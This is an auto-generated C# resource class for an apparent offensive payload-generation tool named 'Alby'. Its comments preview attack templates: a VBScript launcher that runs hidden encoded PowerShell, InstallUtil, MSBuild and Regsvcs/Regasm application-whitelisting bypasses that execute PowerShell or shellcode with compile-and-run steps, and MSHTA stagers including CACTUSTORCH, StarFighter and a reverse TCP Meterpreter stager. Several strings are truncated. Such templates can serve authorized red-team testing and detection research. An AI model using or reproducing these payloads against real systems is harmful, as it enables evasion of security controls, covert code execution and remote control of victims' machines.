//------------------------------------------------------------------------------
// <auto-generated>
//     This code was generated by a tool.
//     Runtime Version:4.0.30319.42000
//
//     Changes to this file may cause incorrect behavior and will be lost if
//     the code is regenerated.
// </auto-generated>
//------------------------------------------------------------------------------

namespace Alby {
    using System;
    
    
    /// <summary>
    ///   A strongly-typed resource class, for looking up localized strings, etc.
    /// </summary>
    // This class was auto-generated by the StronglyTypedResourceBuilder
    // class via a tool like ResGen or Visual Studio.
    // To add or remove a member, edit your .ResX file then rerun ResGen
    // with the /str option, or rebuild your VS project.
    [global::System.CodeDom.Compiler.GeneratedCodeAttribute("System.Resources.Tools.StronglyTypedResourceBuilder", "4.0.0.0")]
    [global::System.Diagnostics.DebuggerNonUserCodeAttribute()]
    [global::System.Runtime.CompilerServices.CompilerGeneratedAttribute()]
    internal class Resources {
        
        private static global::System.Resources.ResourceManager resourceMan;
        
        private static global::System.Globalization.CultureInfo resourceCulture;
        
        [global::System.Diagnostics.CodeAnalysis.SuppressMessageAttribute("Microsoft.Performance", "CA1811:AvoidUncalledPrivateCode")]
        internal Resources() {
        }
        
        /// <summary>
        ///   Returns the cached ResourceManager instance used by this class.
        /// </summary>
        [global::System.ComponentModel.EditorBrowsableAttribute(global::System.ComponentModel.EditorBrowsableState.Advanced)]
        internal static global::System.Resources.ResourceManager ResourceManager {
            get {
                if (object.ReferenceEquals(resourceMan, null)) {
                    global::System.Resources.ResourceManager temp = new global::System.Resources.ResourceManager("Alby.Resources", typeof(Resources).Assembly);
                    resourceMan = temp;
                }
                return resourceMan;
            }
        }
        
        /// <summary>
        ///   Overrides the current thread's CurrentUICulture property for all
        ///   resource lookups using this strongly typed resource class.
        /// </summary>
        [global::System.ComponentModel.EditorBrowsableAttribute(global::System.ComponentModel.EditorBrowsableState.Advanced)]
        internal static global::System.Globalization.CultureInfo Culture {
            get {
                return resourceCulture;
            }
            set {
                resourceCulture = value;
            }
        }
        
        /// <summary>
        ///   Looks up a localized string similar to Dim objShell
        ///Set objShell = WScript.CreateObject(&quot;WScript.Shell&quot;)
        ///command = &quot;powershell -noP -sta -w 1 -enc !INSERTCODEHERE!&quot;
        ///objShell.Run command,0
        ///Set objShell = Nothing
        ///.
        /// </summary>
        internal static string Template_BGInfo_EmpireNative {
            get {
                return ResourceManager.GetString("Template_BGInfo_EmpireNative", resourceCulture);
            }
        }
        
        /// <summary>
        ///   Looks up a localized string similar to &apos;  _________ __              ___________.__       .__     __                       
        ///&apos; /   _____//  |______ ______\_   _____/|__| ____ |  |___/  |_  ___________  ______
        ///&apos; \_____  \\   __\__  \\_  __ \    __)  |  |/ ___\|  |  \   __\/ __ \_  __ \/  ___/
        ///&apos; /        \|  |  / __ \|  | \/     \   |  / /_/  &gt;   Y  \  | \  ___/|  | \/\___ \ 
        ///&apos;/_______  /|__| (____  /__|  \___  /   |__\___  /|___|  /__|  \___  &gt;__|  /____  &gt;
        ///&apos;        \/           \/          \/      /_____/      \/          \/           \/ 
        ///&apos;  [rest of string was truncated]&quot;;.
        /// </summary>
        internal static string Template_BGInfo_StarFighter {
            get {
                return ResourceManager.GetString("Template_BGInfo_StarFighter", resourceCulture);
            }
        }
        
        /// <summary>
        ///   Looks up a localized string similar to using System;
        ///using System.Net;
        ///using System.Diagnostics;
        ///using System.Reflection;
        ///using System.Configuration.Install;
        ///using System.Runtime.InteropServices;
        ///using System.IO;
        /////Add For PowerShell Invocation
        ///using System.Collections.ObjectModel;
        ///using System.Management.Automation;
        ///using System.Management.Automation.Runspaces;
        ///using System.Text;
        ///
        ////*
        ///Author: Casey Smith, Twitter: @subTee
        ///License: BSD 3-Clause
        ///Step One:
        ///C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe  /unsafe /platform:x86 [rest of string was truncated]&quot;;.
        /// </summary>
        internal static string Template_InstallUtil_PowerShell {
            get {
                return ResourceManager.GetString("Template_InstallUtil_PowerShell", resourceCulture);
            }
        }
        
        /// <summary>
        ///   Looks up a localized string similar to using System;
        ///using System.Net;
        ///using System.Diagnostics;
        ///using System.Reflection;
        ///using System.Configuration.Install;
        ///using System.Runtime.InteropServices;
        ///
        ////*
        ///Author: Casey Smith, Twitter: @subTee
        ///License: BSD 3-Clause
        ///Step One:
        ///C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe  /unsafe /platform:x86 /out:exeshell.exe Shellcode.cs
        ///Step Two:
        ///C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe /logfile= /LogToConsole=false /U exeshell.exe
        ///(Or)
        ///C:\Windows\Microsoft.NET\Framework\ [rest of string was truncated]&quot;;.
        /// </summary>
        internal static string Template_InstallUtil_Shellcode {
            get {
                return ResourceManager.GetString("Template_InstallUtil_Shellcode", resourceCulture);
            }
        }
        
        /// <summary>
        ///   Looks up a localized string similar to &lt;Project ToolsVersion=&quot;4.0&quot; xmlns=&quot;http://schemas.microsoft.com/developer/msbuild/2003&quot;&gt;
        ///  &lt;!-- MSBuildShell, a Powershell Host running within MSBuild.exe --&gt;
        ///  &lt;!-- This code let&apos;s you Bypass Application Whitelisting and Powershell.exe restrictions. --&gt;
        ///  &lt;!-- Save This File And Execute The Following Command: --&gt;
        ///  &lt;!-- C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe MSBuildShell.csproj --&gt;
        ///  &lt;!-- Author and founder of the MSBuild Application Whitelisting Bypass code: Casey Smith, Twitter: @ [rest of string was truncated]&quot;;.
        /// </summary>
        internal static string Template_MSBuild_MSBuildShell {
            get {
                return ResourceManager.GetString("Template_MSBuild_MSBuildShell", resourceCulture);
            }
        }
        
        /// <summary>
        ///   Looks up a localized string similar to &lt;Project ToolsVersion=&quot;4.0&quot; xmlns=&quot;http://schemas.microsoft.com/developer/msbuild/2003&quot;&gt;
        ///  &lt;!-- This inline task executes c# code. --&gt;
        ///  &lt;!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe pshell.xml --&gt;
        ///  &lt;!-- Author: Casey Smith, Twitter: @subTee --&gt;
        ///  &lt;!-- License: BSD 3-Clause --&gt;
        ///  &lt;Target Name=&quot;Hello&quot;&gt;
        ///   &lt;FragmentExample /&gt;
        ///   &lt;ClassExample /&gt;
        ///  &lt;/Target&gt;
        ///  &lt;UsingTask
        ///    TaskName=&quot;FragmentExample&quot;
        ///    TaskFactory=&quot;CodeTaskFactory&quot;
        ///    AssemblyFile=&quot;C:\Windows\Microsoft.Net\F [rest of string was truncated]&quot;;.
        /// </summary>
        internal static string Template_MSBuild_PowerShell {
            get {
                return ResourceManager.GetString("Template_MSBuild_PowerShell", resourceCulture);
            }
        }
        
        /// <summary>
        ///   Looks up a localized string similar to &lt;Project ToolsVersion=&quot;4.0&quot; xmlns=&quot;http://schemas.microsoft.com/developer/msbuild/2003&quot;&gt;
        ///  &lt;!-- This inline task executes shellcode. --&gt;
        ///  &lt;!-- C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe SimpleTasks.csproj --&gt;
        ///  &lt;!-- Save This File And Execute The Above Command --&gt;
        ///  &lt;!-- Author: Casey Smith, Twitter: @subTee --&gt; 
        ///  &lt;!-- License: BSD 3-Clause --&gt;
        ///  &lt;Target Name=&quot;Hello&quot;&gt;
        ///    &lt;ClassExample /&gt;
        ///  &lt;/Target&gt;
        ///  &lt;UsingTask
        ///    TaskName=&quot;ClassExample&quot;
        ///    TaskFactory=&quot;CodeTaskFactory&quot;
        ///     [rest of string was truncated]&quot;;.
        /// </summary>
        internal static string Template_MSBuild_Shellcode {
            get {
                return ResourceManager.GetString("Template_MSBuild_Shellcode", resourceCulture);
            }
        }
        
        /// <summary>
        ///   Looks up a localized string similar to &lt;script language=&quot;VBScript&quot;&gt;
        ///&apos;                                (              )  (            )  
        ///&apos;   (    (       (    *   )      )\ )  *   ) ( /(  )\ )  (   ( /(  
        ///&apos;   )\   )\      )\ ` )  /(   ( (()/(` )  /( )\())(()/(  )\  )\()) 
        ///&apos; (((_|(((_)(  (((_) ( )(_))  )\ /(_))( )(_)|(_)\  /(_)|((_)((_)\  
        ///&apos; )\___)\ _ )\ )\___(_(_())_ ((_|_)) (_(_())  ((_)(_)) )\___ _((_) 
        ///&apos;((/ __(_)_\(_|(/ __|_   _| | | / __||_   _| / _ \| _ ((/ __| || | 
        ///&apos; | (__ / _ \  | (__  | | | |_| \__ \  | |  | (_) |   /| (__| __ |         /// [rest of string was truncated]&quot;;.
        /// </summary>
        internal static string Template_MSHTA_CACTUSTORCH {
            get {
                return ResourceManager.GetString("Template_MSHTA_CACTUSTORCH", resourceCulture);
            }
        }
        
        /// <summary>
        ///   Looks up a localized string similar to &lt;HTML&gt; 
        ///&lt;HEAD&gt; 
        ///&lt;script language=&quot;VBScript&quot;&gt;
        ///Dim EncodedPayload: EncodedPayload = &quot;!INSERTCODEHERE!&quot;
        ///
        ///&apos;Then run: wscript.exe StarFighter.js or StarFighter.vbs on Target, or DoubleClick the launchers within Explorer.
        ///
        ///Sub Debug(s)
        ///End Sub
        ///Sub SetVersion
        ///End Sub
        ///Function Base64ToStream(b)
        ///  Dim enc, length, ba, transform, ms
        ///  Set enc = CreateObject(&quot;System.Text.ASCIIEncoding&quot;)
        ///  length = enc.GetByteCount_2(b)
        ///  Set transform = CreateObject(&quot;System.Security.Cryptography.FromBase64Transform&quot;)
        ///  [rest of string was truncated]&quot;;.
        /// </summary>
        internal static string Template_MSHTA_StarFighter {
            get {
                return ResourceManager.GetString("Template_MSHTA_StarFighter", resourceCulture);
            }
        }
        
        /// <summary>
        ///   Looks up a localized string similar to &lt;html&gt;
        ///&lt;head&gt;
        ///&lt;script language=&quot;VBScript&quot;&gt;
        ///&apos;____   ______________  _________   _____          __                
        ///&apos;\   \ /   /\______   \/   _____/  /     \   _____/  |_  ___________ 
        ///&apos; \   Y   /  |    |  _/\_____  \  /  \ /  \_/ __ \   __\/ __ \_  __ \
        ///&apos;  \     /   |    |   \/        \/    Y    \  ___/|  | \  ___/|  | \/
        ///&apos;   \___/    |______  /_______  /\____|__  /\___  &gt;__|  \___  &gt;__|   
        ///&apos;                   \/        \/         \/     \/          \/       
        ///
        ///&apos;VBScript Reversed TCP Meterpreter Sta [rest of string was truncated]&quot;;.
        /// </summary>
        internal static string Template_MSHTA_VBSMeter {
            get {
                return ResourceManager.GetString("Template_MSHTA_VBSMeter", resourceCulture);
            }
        }
        
        /// <summary>
        ///   Looks up a localized string similar to using System;
        ///using System.EnterpriseServices;
        ///using System.Reflection;
        ///using System.Runtime.InteropServices;
        ///using System.IO;
        /////Add For PowerShell Invocation
        ///using System.Collections.ObjectModel;
        ///using System.Management.Automation;
        ///using System.Management.Automation.Runspaces;
        ///using System.Text;
        ///[assembly: AssemblyKeyFileAttribute(&quot;meta.snk&quot;)]
        ///
        ///namespace Bypass_Regsvc_regasm_AppLocker
        ///{
        ///    public class Bypass : ServicedComponent
        ///    {
        ///        static void Main()
        ///        {
        ///
        ///        }
        ///
        ///  [rest of string was truncated]&quot;;.
        /// </summary>
        internal static string Template_RegsvcsRegasm_PowerShell {
            get {
                return ResourceManager.GetString("Template_RegsvcsRegasm_PowerShell", resourceCulture);
            }
        }
        
        /// <summary>
        ///   Looks up a localized string similar to using System;
        ///using System.EnterpriseServices;
        ///using System.Runtime.InteropServices;
        ///[assembly: AssemblyKeyFileAttribute(&quot;meta.snk&quot;)]
        ///
        ///namespace Bypass_Regsvc_regasm_AppLocker
        ///{
        ///    public class Bypass : ServicedComponent
        ///    {
        ///        static void Main()
        ///        {
        ///
        ///        }
        ///
        ///        public Bypass() { Console.WriteLine(&quot;I am a basic COM Object&quot;); }
        ///
        ///        [ComUnregisterFunction] //This executes if registration fails
        ///        public static void UnRegisterClass(string key)
        ///        {
        ///       [rest of string was truncated]&quot;;.
        /// </summary>
        internal static string Template_RegsvcsRegasm_Shellcode {
            get {
                return ResourceManager.GetString("Template_RegsvcsRegasm_Shellcode", resourceCulture);
            }
        }
    }
}
